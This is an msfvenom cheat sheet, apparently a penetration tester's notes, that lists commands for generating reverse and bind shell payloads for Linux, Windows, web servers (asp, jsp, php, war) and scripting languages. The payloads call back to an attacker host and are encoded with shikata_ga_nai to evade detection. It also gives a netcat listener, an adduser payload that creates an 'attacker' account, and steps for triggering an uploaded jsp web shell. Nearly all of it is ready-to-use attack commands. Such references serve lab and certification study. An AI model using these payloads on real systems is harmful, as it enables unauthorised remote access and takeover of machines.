Msfvenom Cheat Sheet

Msfvenom cheat sheet for generating shellcode and payloads.

Handlers

Meterpreter-based payloads require the exploit/multi/handler module to catch the session within msfconsole.

This can be set up easily using handler.sh, a simple bash script I wrote:

  _             _ _         
 | |_ ___ ___ _| | |___ ___ 
 |   | .'|   | . | | -_|  _|
 |_|_|__,|_|_|___|_|___|_|

usage: ./handler.sh <payload> <ip> <port>

common payloads:
windows/meterpreter/reverse_tcp       windows/x64/meterpreter/reverse_tcp
linux/x64/meterpreter/reverse_tcp     linux/x86/meterpreter/reverse_tcp
generic/shell_reverse_tcp             php/meterpreter/reverse_tcp


Generated payloads that do not include Meterpreter can still be caught with exploit/multi/handler in msfconsole. Netcat is a solid alternative, and shells obtained via Netcat can be easily upgraded to Meterpreter sessions.

A basic Netcat listener goes as follows:

root@kali:~# nc -nlvp <port>    // Specify the listening port (LPORT)


Msfvenom ~ Shellcode

Linux Shellcode

// -b badchars will vary for exploit development
msfvenom -p linux/x86/shell_reverse_tcp LHOST=AttackerIP LPORT=port -f c -e x86/shikata_ga_nai -b "\x00\x0a\x0d\x20"
msfvenom -p linux/x86/shell_bind_tcp RHOST=TargetIP LPORT=port -f c -e x86/shikata_ga_nai -b "\x00\x0a\x0d\x20"


Windows Shellcode

// -b badchars will vary for exploit development
msfvenom -p windows/shell_reverse_tcp LHOST=AttackerIP LPORT=port EXITFUNC=thread -f c -e x86/shikata_ga_nai -b "\x00\x0a\x0d"
msfvenom -p windows/shell_bind_tcp RHOST=TargetIP LPORT=port EXITFUNC=thread -f c -e x86/shikata_ga_nai -b "\x00\x0a\x0d"


Msfvenom ~ Payloads

Linux Payloads

msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=AttackerIP LPORT=port -f elf > shell.elf
msfvenom -p linux/x86/meterpreter/bind_tcp RHOST=TargetIP LPORT=port -f elf > shell.elf

msfvenom -p generic/shell_bind_tcp RHOST=TargetIP LPORT=port -f elf > shell.elf
msfvenom -p generic/shell_reverse_tcp LHOST=AttackerIP LPORT=port -f elf > shell.elf

msfvenom -p linux/x86/shell/reverse_tcp LHOST=AttackerIP LPORT=port -f elf > shell.elf
msfvenom -p linux/x86/shell/bind_tcp RHOST=TargetIP LPORT=port -f elf > shell.elf


Windows Payloads

msfvenom -p windows/meterpreter/reverse_tcp LHOST=AttackerIP LPORT=port -f exe > reverse.exe
msfvenom -p windows/meterpreter/bind_tcp RHOST=TargetIP LPORT=port -f exe > bind.exe
msfvenom -p windows/adduser USER=attacker PASS=attacker@123 -f exe > adduser.exe
msfvenom -p windows/shell/reverse_tcp LHOST=AttackerIP LPORT=port -f exe > prompt.exe
msfvenom -p windows/meterpreter/reverse_tcp LHOST=AttackerIP LPORT=port -e x86/shikata_ga_nai -i 3 -f exe > encoded.exe


Web Payloads

msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.11.0. LPORT=1234 -f asp > shell.asp
msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.11.1. LPORT=443 -f raw > shell.jsp
msfvenom -p php/meterpreter_reverse_tcp LHOST=10.11.0. LPORT=443 -f raw > shell.php
msfvenom -a x86 --platform windows -p php/meterpreter_reverse_tcp LHOST=10.11.0.89 LPORT=443 -e x86/shikata_ga_nai -f raw > shell.php

msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.11.0. LPORT=443 -f war > shell.war

// Extracting the jsp file from shell.war:
# jar -xvf shell.war    // You'll get the jsp file, e.g. ehfwj64g.jsp
// If you can upload a .war to a web application, you can execute the jsp by browsing to
// the upload dir and requesting the extracted .jsp file to trigger the shell:

http://website.com/uploads/ehfwj64g.jsp


exploit/multi/script/web_delivery


Scripting Payloads

msfvenom -p cmd/unix/reverse_python LHOST=10.11.0. LPORT=443 -f raw > shell.py
msfvenom -p cmd/unix/reverse_bash LHOST=10.11.0. LPORT=443 -f raw > shell.sh
msfvenom -p cmd/unix/reverse_perl LHOST=10.11.0. LPORT=443 -f raw > shell.pl
msfvenom -p linux/x86/shell_reverse_tcp -f js_le LHOST=10.11.0. LPORT=443  // JavaScript, little endian